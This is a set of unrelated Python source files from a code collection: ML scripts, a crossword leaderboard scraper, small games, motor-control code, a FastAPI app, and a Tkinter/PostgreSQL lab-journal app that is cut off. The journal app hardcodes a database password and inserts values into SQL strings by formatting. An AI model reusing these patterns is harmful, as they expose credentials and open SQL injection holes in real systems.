tf.GPUOptions(per_process_gpu_memory_fraction=0.2)\nsess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True, log_device_placement=True))\n\n\nfrom keras.models import model_from_json, Sequential\nfrom keras.preprocessing import sequence\nimport numpy as np\nimport math\nimport logging\nimport sys\nimport time\nimport nltk\nimport data_generator\nfrom scipy.stats.mstats_basic import sen_seasonal_slopes\n\n\n\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\nlogger = logging.getLogger(__name__)\n\n\nclass SentenceGeneration(object):\n def __init__(self):\n self.model = Sequential()\n self.index2word = dict()\n self.word2Index = dict()\n self.index2token = dict()\n self.token2Index = dict()\n with open(\"../data/comment_f_keyword_Vocab.txt\") as fin:\n for i, word in enumerate(fin):\n word = word.rstrip()\n self.index2word[i] = word\n self.word2Index[word] = int(i)\n with open(\"../data/code_f_keyword_Vocab.txt\") as fin:\n for i, word in enumerate(fin):\n word = word.rstrip()\n self.index2token[i] = word\n self.token2Index[word] = int(i)\n\n # def __init__(self,codes,targets):\n # self.model = Sequential()\n # # self.codes = codes\n # # self.targets = targets\n\n def readModel(self, name):\n model = model_from_json(open('../model/'+name + '.json').read())\n model.load_weights('../model/'+name + '.h5')\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=[\"accuracy\"])\n\n self.model = model\n\n def printSentence(self, indices):\n return ' '.join([self.index2word[x] for x in indices])\n\n #for index in indices:\n # print self.index2word[index],\n def returnCode(self, indices):\n\n return ' '.join([self.index2token[x-1] for x in indices])\n\n def removeToken(self,indices):\n indices = indices[1:-1]\n unk_index = self.word2Index['UNK']\n if unk_index in indices:\n indices.remove(unk_index)\n return indices\n\n\n\n\n\n def generateSentence(self, code, n):\n\n code = sequence.pad_sequences([code], maxlen=600)\n\n\n pred = self.model.predict(code)[0]\n sorted_pred = np.argsort(pred)[::-1]\n\n pred_word = [ self.index2token[index] for index in sorted_pred[:n]]\n return pred_word\n\n\ndef rAtk(pred, target, k):\n #sorted_pred = np.argsort(pred)[::-1]\n correct = 0\n for i in pred[:k]:\n if i in target:\n correct += 1\n\n return correct / float(len(target))\n\ngen = SentenceGeneration()\ngen.readModel('keyword_f')\n\ndata_gen = data_generator.DataGenerator(\"../data/code_f_keyword_indexed.txt\", \"../data/comment_f_keyword_indexed.txt\",\n 0.20, 600, 20)\n\ncodes,keywords,raw_comment= data_gen.getTestData()\n\nnp.random.seed(30)\nnp.random.shuffle(codes)\nnp.random.seed(30)\nnp.random.shuffle(raw_comment)\nnp.random.seed(30)\nnp.random.shuffle(keywords)\n\n\nsens = []\nco = []\ncomm = []\nr = 0\nk = 30\nfor i,(code,comment) in enumerate(zip(codes,keywords)):\n #keyword = gen.generateSentence(code,5)\n c = sequence.pad_sequences([code], maxlen=600)\n pred = gen.model.predict(c)[0]\n #pred[52] = 0\n\n sorted_pred = np.argsort(pred)[::-1]\n\n sens.append([gen.index2word[s] for s in sorted_pred[:k]])\n co.append(gen.returnCode(code))\n comm.append(gen.printSentence(comment))\n\n r += rAtk(sorted_pred, comment, k)\n\n\n\n sys.stdout.write('\\r' + str(i)+' score :'+str(r/(i+1)))\n\n\n\n\n\n\nwith open('keyword_prediction4.txt', 'w') as fin:\n fin.write(str(r/(i+1)))\n fin.write(\"\\n\")\n for i in range(len(co[:300])):\n s = str(co[i])\n code = s.replace(\"{\",\"{\\n\").replace(\";\",\";\\n\").replace(\"}\",\"}\\n\")\n fin.write(\"code:\\n\"+ code)\n fin.write(\"comment:\\n\"+ raw_comment[i].rstrip()+ '\\n')\n fin.write(\"--generate--\\n\")\n\n fin.write(' '.join(sens[i])+'\\n')\n fin.write(\"\\n\")\n # for sen in sens:\n # fin.write(gen.printSentence(sen[1:-1])+'\\n')\n","sub_path":"predictor/KeywordPrediction.py","file_name":"KeywordPrediction.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"269342709","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 20 13:08:08 2019\r\n\r\n@author: jbgab\r\n\"\"\"\r\n\r\nimport glob\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport SoilVarDepth\r\n\r\nfolderPath='ternsoildata\\\\'\r\nfiles = glob.glob(folderPath+'*.dat')\r\ninfiles=[]\r\nfor file in files: \r\n thisfile=pd.read_csv(file,index_col=0,skiprows=[0,2,3])\r\n thisfile.index=pd.to_datetime(thisfile.index)\r\n infiles.append(thisfile)\r\nconcat=pd.concat(infiles[:], ignore_index=False,sort=False)\r\nconcat.index=pd.to_datetime(concat.index)\r\n#list columns that you want to plot\r\nVW_Avg=['VW_Avg(1)', 'VW_Avg(2)', 'VW_Avg(3)', 'VW_Avg(4)']\r\nPA=['PA_uS_Avg(1)', 'PA_uS_Avg(2)', 'PA_uS_Avg(3)', 'PA_uS_Avg(4)']\r\n#select list of columns you want to plot\r\ncolumns=VW_Avg\r\ncolumns.reverse()\r\n\r\nsizeParam=30,6 #change x,y size of plot\r\nconcat=concat.loc[:,columns]\r\n#pivot=concat.loc[:,['VW_Avg(1)', 'VW_Avg(2)', 'VW_Avg(3)', 'VW_Avg(4)']].T.astype(float)\r\npivot=concat.pivot_table(columns=concat.index)\r\npivot=pivot.reindex(index=columns)\r\n\r\nSoilVarDepth.soilVarDepth(pivot,title='ternsoildata',sizeParam=sizeParam,xlabel='onceamonth')\r\n\r\n","sub_path":"ternsoildataSoilVarDepth.py","file_name":"ternsoildataSoilVarDepth.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"259022401","text":"import requests\nimport json\nimport datetime\nimport sys\nimport re\n\ndef save_results(response):\n pattern = r\".+scoreList.+?(\\[.+?\\]).+\"\n body = response.text.splitlines()\n for b in body:\n match = re.match(pattern, b)\n if match is not None:\n break\n scores = match.group(1)\n l = json.loads(scores)\n today = datetime.datetime.today()\n date_str = str(today.date())\n d = {date_str: l}\n with open('scores.json', 'w') as fout:\n fout.write(json.dumps(d))\n print('Success')\n \ndef get_nyt_body(cookie):\n url = \"https://www.nytimes.com/puzzles/leaderboards\"\n headers = {\n 'authority': 'www.nytimes.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-user': '?1',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'sec-fetch-site': 'none',\n 'referer': 'https://www.nytimes.com/crosswords',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.9',\n 'cookie': cookie,\n }\n\n response = requests.get('https://www.nytimes.com/puzzles/leaderboards', headers=headers)\n if response.status_code != 200:\n print(\"Unable to connect to nyt status_code:%s\" % response.status_code)\n return None\n return response\n\ndef main(cookie):\n response = get_nyt_body(cookie)\n if response is None:\n sys.exit(1)\n return\n save_results(response)\n \n\nif __name__ == \"__main__\":\n \n cookie = sys.argv[1]\n main(cookie)","sub_path":"get_crossword.py","file_name":"get_crossword.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"263705014","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 18 11:02:28 2018\n\n@tillyoswellwheeler: 612383362\n\"\"\"\n\n#---------------------------------------------------------------------------------------\n# CHAPTER TEN - Guessing Game\n#---------------------------------------------------------------------------------------\n\nfrom random import randint\n\n# The imported function is below:\ndef guess(attempts, end_range):\n number = randint(1, end_range)\n print(\"Welcome! Can you guess my secret number?\")\n # My code is below:\n # Tell the user how many attempts/guesses they have.\n \n print(\"You have {} attempts to guess right\".format(attempts))\n \n # Read in their guess into the game\n \n while attempts > 0:\n guess = input(\"What's my secret number? \")\n guess = int(guess)\n attempts -= 1\n \n # Compare their guess to the number which has been generated from the randint imported function\n if guess == number:\n print(\"You're a telepathic genius!\")\n return\n # Tell them if their guess is right or wrong\n print(guess, \" was correct\")\n # Note if they are right how do we *break* out of the while loop?\n # If the while loop is looping not just on guesses but on the correct guess?\n print(\"You had\", attempts, \"left!\")\n break\n # If their guess is wrong, tell them whether they are too high or too low\n elif guess != number:\n if guess >= number:\n print(\"Your guess was too high\")\n elif guess <= number:\n print(\"Your guess was too low\")\n else:\n return number\n \n print(\"END-OF-GAME: Thanks for playing!\")\n print(\"The secret number was\", number)\n\nguess(3, 20) \n","sub_path":"ch11_while-loops/ch11_guessing_game.py","file_name":"ch11_guessing_game.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"89394163","text":"import random\n\nclass Hangman:\n possible_words = ['becode', 'learning', 'mathematics', 'sessions']\n word_to_find = \"\"\n hidden_word = []\n lives = 5\n letter = ''\n number_of_words = 0\n correctly_guessed_letters = []\n wrongly_guessed_letters = []\n turn_count = 0\n error_count = 0\n\n def init_my_function(cls):\n cls.number_of_words = len(cls.possible_words) - 1\n cls.word_to_find = cls.possible_words[random.randint(0, cls.number_of_words)]\n cls.hidden_word = '_' * len(cls.word_to_find)\n print(\" \".join(list(map(str,cls.hidden_word))))\n print('')\n\n def start_game(cls):\n cls.init_my_function()\n cls.play()\n\n def print_my_round(cls):\n print(\" \".join(list(map(str,cls.hidden_word))))\n print('\\n')\n print(f\"Wrongly guessed letter --> {cls.wrongly_guessed_letters}.\")\n print(f\"Correctly guessed letter --> {cls.correctly_guessed_letters}.\")\n print(f\"Number of lives remaining --> {cls.lives}.\")\n print(f\"Error Count --> {cls.error_count}.\")\n print(f\"Turn Count --> {cls.turn_count}.\")\n\n def game_over():\n print(\"GAME OVER ...\")\n\n def well_played(cls):\n print(f\"You found the word: {cls.word_to_find} in {cls.turn_count} turn with {cls.error_count} errors!\")\n\n def check_letter(cls):\n if len(cls.letter) != 1:\n print(\"Please, insert only one character\")\n return 1\n# def check_end_of_game(cls):\n# if c\n\n def play(cls):\n while (cls.lives) != 0:\n cls.letter = input(\"Please enter a letter: \")\n cls.print_my_round()\n","sub_path":"utils/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"495734259","text":"from adafruit_servokit import ServoKit #서보모터 드라이버를 사용하기 위해 패키지를 불러옵니다\nimport board #서보모터 드라이버 패키지에 종속된 패키지입니다\nimport busio #위와같이 서보모터 드라이버 패키지에 종속된 패키지입니다\nimport time #모터 제어시 delay를 주기 위해 time패키지를 불러옵니다\n\n\"\"\"\nmotorinit()함수는\n배에 있는 두 종류의 모터(BLDC 프로펠러, 서보모터)들을 사용하기 위해\n서보모터 드라이버와 ESC(BLDC 모터 드라이버)를 초기화 시키는 코드입니다\n또한 다른 위치로 가있는 서보모터를 중앙으로 정렬하기도 합니다\n\n\n작동원리\n서보모터 드라이버의 모터 0번에 서보모터가 연결되어있습니다\n서보모터 드라이버의 모터 1번에 BLDC 모터와 연결된 ESC(드라이버)가 연결되어 있습니다\n\n서보모터의 경우 서보모터 드라이버만 초기화 되면 바로 사용할 수 있지만\nBLDC모터의 경우 처음 전원을 켰을 때 ESC에 90의 PWM 신호를 주어 초기화를 시켜 주어야 합니다\n그러고 나면 이 90 신호는 중간(정지) 신호가 되고 90보다 얼마나 작느냐 크느냐에 따라\n각각 정회전 속도와 역회전 속도 신호가 됩니다\n\"\"\"\n\ndef motorinit():\n print(\"i2c connetion initalzing\")\n i2c_bus0=(busio.I2C(board.SCL_1, board.SDA_1)) #i2c통신을 젯슨 나노의 27,28번 핀으로 시작합니다\n global ship_servo_kit #전역변수 ship_servo_kit(서보모터 드라이버 제어 관련)를 선언합니다\n ship_servo_kit = ServoKit(channels=16, i2c=i2c_bus0) #ship_servo_kit에 서보모터 드라이버를 연결합니다\n print(\"i2c connection initalzing finished\")\n ship_servo_kit.servo[0].angle=90 #0번째 모터(서보모터)에 90도 각도를 주어, 서보모터가 다른 위치를 향하고 있을 때, 정면으로 향하게 합니다\n print(\"servo motor initalzing finished\")\n print(\"BLDC motor calibrating\")\n ship_servo_kit.servo[1].angle=90 #1번째 모터(ESC에 연결된 BLDC 모터)에 90 신호를 주어 ESC 신호를 보정합니다(2초정도 필요함)\n time.sleep(2) #2초정도 기다립니다\n print(\"BLDC motor calibrating finished\")\n\n\"\"\"\nservomove(각도)함수는\n말 그대로 서보모터를 주어진 각도로 회전시키는 함수입니다\n간단히 함수를 호출하고 각도를 넣으면 되는 함수입니다\n\"\"\"\n \ndef servomove(degree):\n global ship_servo_kit #ship_servo_kit(서보모터 드라이버 제어 관련)을 이 함수에서도 사용합니다\n ship_servo_kit.servo[0].angle=degree #0번째 모터(서보모터)를 주어진 각도로 움직입니다\n time.sleep(0.02) #에러를 방지하기 위해 0.02초 지연합니다\n\n\"\"\"\nservomove(90을 기준으로 속도)함수는\n말 그대로 BLDC 모터를 주어진 속도로 회전시키는 함수입니다\n90을 기준으로 작으면 정회전을 하고, 크면 역회전을 합니다\n값이 얼마나 90에서 멀어지느냐에 따라서 속도가 커집니다\n간단히 함수를 호출하고 속도를 넣으면 되는 함수입니다\n\"\"\" \n \ndef bldcmove(speed):\n global ship_servo_kit #ship_servo_kit(서보모터 드라이버 제어 관련)을 이 함수에서도 사용합니다\n ship_servo_kit.servo[1].angle=speed #1번째 모터(BLDC 모터)를 90을 기준으로 주어진 속도로 움직입니다\n time.sleep(0.02) #에러를 방지하기 위해 0.02초 지연합니다\n","sub_path":"codes_with_explain/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"479324018","text":"#!/usr/bin/env python\nfrom jinja2 import Template, Environment, FileSystemLoader\nimport os\nimport json\n\n# Capture our current directory\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\ndef show_cli_output(template_file, response):\n # Create the jinja2 environment.\n # Notice the use of trim_blocks, which greatly helps control whitespace.\n\n template_path = os.path.abspath(os.path.join(THIS_DIR, \"../render-templates\"))\n\n j2_env = Environment(loader=FileSystemLoader(template_path),extensions=['jinja2.ext.do']) \n j2_env.trim_blocks = True\n j2_env.lstrip_blocks = True\n j2_env.rstrip_blocks = True\n\n if response:\n print (j2_env.get_template(template_file).render(json_output=response))\n","sub_path":"src/CLI/renderer/scripts/render_cli.py","file_name":"render_cli.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"134681862","text":"#LANGUAGE: Python\n# AUTHOR: Nishigandha Kalkote\n# GITHUB: \"https://github.com/nishikalkote\"\n\n\nprint(\"HELLO WORLD!\")\narr = []\nn = int(input('Enter how many elements you want: '))\nfor i in range(0, n):\n x = input('Enter the numbers into the array: ')\n arr.append(x)\nprint(arr)\n","sub_path":"programs/Helloarray.py","file_name":"Helloarray.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"118015004","text":"from fastapi import FastAPI, Depends, Request\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.templating import Jinja2Templates\n\nfrom .routers import users, projects\nfrom .database import engine, metadata\n\n\nmetadata.create_all(bind=engine)\n\napp = FastAPI(\n \n)\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\norigins = ['*']\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"]\n)\n\napp.include_router(users.router)\napp.include_router(projects.router)\n\ntemplates = Jinja2Templates(directory='templates')\n\n# @app.on_event(\"startup\")\n# async def startup():\n# await database.connect()\n\n# @app.on_event(\"shutdown\")\n# async def shutdown():\n# await database.disconnect()\n\n@app.get(\"/dashboard\", response_class=HTMLResponse)\nasync def root(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request, \"id\": id})\n\n\n\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"454823998","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport numpy as np\nimport tensorflow as tf\nimport time\nimport sys\n\nfrom . import analysis\nfrom . import config\nfrom contextlib import contextmanager\nfrom xilio import dump, write, append\n\n\ntools = type(\"Tools\", (), {})()\n\n__all__ = [\"simple_train\", \"training\"]\n\n\ndef epoch_train(tools):\n \"\"\"\n Do epoch train for one times.\n\n input: tools\n\n \"\"\"\n sess = tools.sess\n optimizer = tools.optimizer\n\n infos, summary, g, _ = sess.run(tools.infos)\n print(config.INFOMESSAGE(infos))\n sys.stdout.flush()\n tools.reporter(summary, g)\n\n try:\n while True:\n sess.run(optimizer)\n except tf.errors.OutOfRangeError:\n pass\n return infos\n\n\n@contextmanager\ndef training(merge_key=tf.GraphKeys.SUMMARIES, restore_from=None):\n with tf.Session() as sess:\n graph = tf.get_default_graph()\n\n path = config.DATANAME + \"/\" + time.strftime(\"%m-%d-%y_%H_%M\")\n # path = config.DATANAME\n g = tf.Variable(0, name=\"global_step\", trainable=False)\n with tf.name_scope(\"epoch_step\"):\n e = tf.Variable(0, name=\"epoch_step\", trainable=False)\n e_add = tf.assign(e, e + 1)\n\n fin_loss = analysis.fin_loss()\n with tf.name_scope(\"train\"):\n learning_rate = tf.train.exponential_decay(\n float(config.LEARNING_RATE), e,\n float(config.DECAY_STEP), float(config.DECAY_RATE)\n )\n optimizer = (tf.train.AdamOptimizer(learning_rate)\n .minimize(fin_loss, global_step=g))\n accur = graph.get_tensor_by_name(\"analysis/accuracy_train:0\")\n val_accur = graph.get_tensor_by_name(\"analysis/accuracy_test:0\")\n infos = [e, fin_loss, accur, val_accur]\n updates = [e_add, optimizer]\n\n writer = tf.summary.FileWriter(path + \"/summary\", graph)\n summary = tf.summary.merge_all(merge_key)\n saver = tf.train.Saver(tf.get_collection(\"trainable_variables\"))\n print(\"check\")\n if restore_from:\n print(config.DATANAME + \"/\" + restore_from)\n ckpt = tf.train.latest_checkpoint(\n config.DATANAME + \"/\" + restore_from)\n if ckpt:\n print(\"RESTROE\")\n saver.restore(sess, ckpt)\n\n tools.path = path\n tools.sess = sess\n tools.graph = graph\n tools.saver = saver\n tools.infos = [infos, summary, g, updates]\n tools.optimizer = optimizer\n import types\n\n def reporter(self, summary, e):\n writer.add_summary(summary, e)\n writer.flush()\n saver.save(sess, path + \"/chkpnt\", g)\n\n tools.reporter = types.MethodType(reporter, tools)\n\n tf.global_variables_initializer().run(None, sess)\n tf.local_variables_initializer().run(None, sess)\n graph.finalize()\n yield tools\n\n\ndef dump_info(path, info):\n f = open(path)\n f.write(info)\n f.close()\n\n\ndef simple_train(epoch_steps):\n infos = []\n start_time = time.time()\n with training(restore_from=config.RESTORE_FROM) as tools:\n write(tools.path + \"/description\", config.DISCRIPTION + \"\\n\")\n for i in range(epoch_steps):\n batch_init = tf.get_collection(\"batch_init\")\n tools.sess.run(batch_init)\n infos.append(epoch_train(tools))\n if i > 5:\n recent = [x[1] for x in infos[-5:]]\n if np.std(recent) < config.STOP_THRESHOLD:\n break\n dump(tools.path + \"/trace\", infos)\n duration = time.time() - start_time\n append(tools.path + \"/description\",\n \"Time usage: \" + time.strftime(\n \"%M minutes, %S seconds\",\n time.gmtime(duration)) + \"\\n\")\n return infos\n","sub_path":"lc/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"407745876","text":"#!/usr/bin/env python3\n\nfrom tkinter import * \nfrom tkinter.ttk import Combobox, Radiobutton, Entry, Spinbox \nimport tkinter.ttk as ttk\nimport datetime\nfrom datetime import date\nimport ast\nimport winreg \nimport psycopg2\nfrom idlelib.tooltip import Hovertip\nimport subprocess\nimport configparser\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\nsurnames = config['people']['engineers']\nsurnames = [element.strip(\"'[]\") for element in surnames.split(\", \")]\nprint(surnames)\nprint(type(surnames))\n\n\n#Работа с буфером по клавишам Ctr-C, Ctr-V, Ctr-X\ndef _onKeyRelease(event): \n ctrl = (event.state & 0x4) != 0\n if event.keycode==88 and ctrl and event.keysym.lower() != \"x\":\n event.widget.event_generate(\"<>\")\n if event.keycode==86 and ctrl and event.keysym.lower() != \"v\":\n event.widget.event_generate(\"<>\")\n if event.keycode==67 and ctrl and event.keysym.lower() != \"c\":\n event.widget.event_generate(\"<>\")\n\n# Функция работы с комментариями по стендам\ndef comments(model, SN):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n print(\"Подключение к базе данных: ОК\")\n \n except:\n print(\"Не удалось подключиться к базе данных\")\n \n # Считывание комментариев по заданному SN\n try:\n cur = con.cursor()\n if SN == \"ALL\":\n cur.execute(\"SELECT date, time, author, commentary, serial_number, number_in_departament FROM public.comments ORDER BY (date, time) DESC;\")\n rows = cur.fetchall()\n else:\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time) DESC;\" %SN)\n rows = cur.fetchall()\n with open(\"comments.txt\", 'w', encoding='utf-8') as f:\n for row in rows:\n f.write(\"\\nДата: \" + str(row[0]))\n f.write(\"\\nВремя: \" + str(row[1]))\n f.write(\"\\nАвтор: \" + str(row[2]))\n f.write(\"\\nКомментарий: \" + str(row[3]))\n f.write(\"\\nСерийный: \" + str(row[4]))\n f.write(\"\\nПорядковый номер: \" + str(row[5]))\n f.write(\"\\n\")\n con.close()\n except:\n print(\"Данные в таблице комментариев отсутствуют\")\n subprocess.Popen(\"C:\\\\Windows\\\\notepad.exe D:\\\\myprogram\\\\bin\\\\journal\\\\comments.txt\")\n\n# Фукнция открытия карточки компьютера\ndef PC_card(model, SN, number_in_departament):\n window_card = Tk()\n window_card.bind_all(\"\", _onKeyRelease, \"+\") \n window_card.title(\"Карточка компьютера \" + model)\n window_card.geometry(\"620x500\")\n Label(window_card, text = (\"Последние комментарии:\")).place(x=10, y=90)\n text_card = Text(window_card, width=50, height=10)\n text_card.place(x=10, y=110)\n text_card.bind(\"\")\n SUBD_get_PC(model, window_card, text_card, SN)\n Label(window_card, text = (\"Ваш комментарий:\")).place(x=10, y=300)\n text_wr = Text(window_card, width=50, height=5)\n text_wr.place(x=10, y=320)\n text_wr.bind(\"\")\n Label(window_card, text = (\"Новый IP:\")).place(x=480, y=190)\n IP_new = Text(window_card, width=13, height=1)\n IP_new.place(x=480, y=215)\n IP_new.insert(1.0, '192.168.0.0')\n poverka_wr = Button(window_card, text=\"Записать\", command = lambda: SUBD_push_one(window_card, IP_new, SN, model, pc))\n poverka_wr.place(x=490, y=240)\n btn_wr = Button(window_card, text=\"Отправить\", command = lambda: SUBD_push(window_card, text_wr, model, combo, sel.get(), text_card, number_in_departament))\n btn_wr.place(x=350, y=420)\n lbl01 = Label(window_card, text = \"Выберите фамилию:\").place(x=10, y=420)\n combo = Combobox(window_card, width = 13, values = surname)\n combo.place(x=150, y=420)\n combo.current(3)\n lbl_alarms = LabelFrame(window_card, text = \"Состояние\")\n lbl_alarms.place(x = 470, y=300, width = 140, height = 120)\n sel = IntVar(lbl_alarms)\n sel.set(1)\n rad_alarm1 = Radiobutton(lbl_alarms, text='В работе', variable=sel, value=1)\n rad_alarm1.place(x=5, y=0)\n rad_alarm2 = Radiobutton(lbl_alarms, text='Не работает', variable=sel, value=2)\n rad_alarm2.place(x=5, y=30) \n rad_alarm3 = Radiobutton(lbl_alarms, text='Есть проблемы', variable=sel, value=3)\n rad_alarm3.place(x=5, y=60)\n\n#Функция получения данных о компьютере из БД\ndef SUBD_get_PC(model, window_card, text_card, SN):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n label_dbsuc = Label(window_card, text = \"Подключение к базе данных: ОК\", foreground = 'green')\n label_dbsuc.place(x=10, y=5)\n\n except:\n label_dbsuc = Label(window_card, text = \"Не удалось подключиться к базе денных\", foreground = 'red')\n label_dbsuc.place(x=10, y=5)\n\n try:\n # Считывание данных ПК из таблицы pc\n cur = con.cursor()\n cur.execute(\"SELECT serial_number, name_pc, ip, alarms, radmin, windows, net_monitor, inkotex, other_soft FROM public.pc WHERE serial_number = \\'%s\\';\" %SN)\n rows = cur.fetchall()\n for row in rows:\n Label(window_card, text = (\"СН установки: \" + row[0])).place(x=10, y=25)\n name_PC = row[1]\n Label(window_card, text = (\"Номер ПК: \" + row[1])).place(x=10, y=45)\n Label(window_card, text = (\"IP-адрес: \" + row[2])).place(x=10, y=65)\n ip_ad = row[2]\n print(ip_ad)\n if row[3] == 'work':\n Label(window_card, text = (\"Состояние: \" + row[3]), foreground = 'green').place(x=200, y=25)\n elif row[3] == 'not_work':\n Label(window_card, text = (\"Состояние: \" + row[3]), foreground = 'red').place(x=200, y=25)\n elif row[3] == 'is_problems':\n Label(window_card, text = (\"Состояние: \" + row[3]), foreground = 'orange').place(x=200, y=25)\n else:\n Label(window_card, text = (\"Состояние: нет\"), foreground = 'red').place(x=200, y=25)\n Label(window_card, text = (\"Radmin: \" + row[4])).place(x=200, y=45)\n Label(window_card, text = (\"Windows: \" + row[5])).place(x=200, y=65)\n Label(window_card, text = (\"Net Monitor 2: \" + row[6])).place(x=390, y=65)\n Label(window_card, text = (\"Инкотекс: \" + row[7])).place(x=390, y=25)\n Label(window_card, text = (\"Другие: \" + row[8])).place(x=390, y=45)\n btn_radmin = Button(window_card, text=\"Radmin\", command = lambda: subprocess.Popen('C:\\\\Program Files\\\\Radmin Viewer 3\\\\Radmin.exe /connect:%s:4899 '%ip_ad))\n btn_radmin.place(x=490, y=110)\n btn_ping = Button(window_card, text=\"Ping\", command = lambda: subprocess.Popen('C:\\\\windows\\\\system32\\\\ping.exe %s '%ip_ad))\n btn_ping.place(x=490, y=145)\n except:\n Label(window_card, text = \"Данные в таблице установок отсутсвуют!!!\", foreground = 'red').place(x=10, y=25)\n\n try:\n # Считывание комментариев по данному компьютеру\n cur.execute(\"SELECT date, time, author, commentary FROM public.comments WHERE serial_number = \\'%s\\' ORDER BY (date, time);\" %model)\n rows = cur.fetchall()\n for row in rows:\n text_card.insert(1.0, \"\\nДата: \" + str(row[0]))\n text_card.insert(1.0, \"\\nВремя: \" + str(row[1]))\n text_card.insert(1.0, \"\\nАвтор: \" + row[2])\n text_card.insert(1.0, \"\\nКомментарий: \" + row[3])\n text_card.insert(1.0, \"\\n\")\n con.close()\n except:\n text_card.insert(1.0, \"Данные в таблице комментариев отсутствуют\")\n\n\n# Функция открытия карточки стенда\ndef installation_card(model, SN, number_in_departament):\n window_card = Tk()\n window_card.bind_all(\"\", _onKeyRelease, \"+\") \n window_card.title(\"Карточка стенда \" + model + \" SN \" + SN)\n window_card.geometry(\"620x500\")\n Label(window_card, text = (\"Последние комментарии:\")).place(x=10, y=90)\n text_card = Text(window_card, width=50, height=10)\n text_card.place(x=10, y=110)\n SUBD_get(window_card, text_card, SN)\n Label(window_card, text = (\"Ваш комментарий:\")).place(x=10, y=300)\n text_wr = Text(window_card, width=50, height=5)\n text_wr.place(x=10, y=320)\n Label(window_card, text = (\"Новая дата:\")).place(x=480, y=190)\n poverka_text = Text(window_card, width=10, height=1)\n poverka_text.place(x=480, y=215)\n poverka_text.insert(1.0, 'ГГГГ-ММ-ДД')\n poverka_wr = Button(window_card, text=\"Записать\", command = lambda: SUBD_push_one(window_card, poverka_text, SN, number_in_departament, installations))\n poverka_wr.place(x=490, y=240)\n btn_wr = Button(window_card, text=\"Отправить\", command = lambda: SUBD_push(window_card, text_wr, SN, combo, sel.get(), text_card, number_in_departament))\n btn_wr.place(x=350, y=420)\n lbl01 = Label(window_card, text = \"Выберите фамилию:\").place(x=10, y=420)\n combo = Combobox(window_card, width = 13, values = surname)\n combo.place(x=150, y=420)\n combo.current(3)\n lbl_alarms = LabelFrame(window_card, text = \"Состояние\")\n lbl_alarms.place(x = 470, y=300, width = 140, height = 120)\n sel = IntVar(lbl_alarms)\n sel.set(1)\n rad_alarm1 = Radiobutton(lbl_alarms, text='В работе', variable=sel, value=1)\n rad_alarm1.place(x=5, y=0)\n rad_alarm2 = Radiobutton(lbl_alarms, text='Не работает', variable=sel, value=2)\n rad_alarm2.place(x=5, y=30) \n rad_alarm3 = Radiobutton(lbl_alarms, text='Есть проблемы', variable=sel, value=3)\n rad_alarm3.place(x=5, y=60)\n \n\n# Функция записи комментариев в БД (установки)\ndef SUBD_push(window_card, text_wr, SN, combo, alarms, text_card, number_in_departament):\n try:\n # Подключение к БД\n con = psycopg2.connect(\n database=\"Virtual_department\", \n user=\"user\", \n password=\"showmustgoon\", \n host=\"192.168.0.150\", \n port=\"5432\")\n Label(window_card, text = \"Подключение к базе данных: ОК \", foreground = 'green').place(x=10, y=450)\n except:\n Label(window_card, text = \"Подключение к базе данных отсутсвует\", foreground = 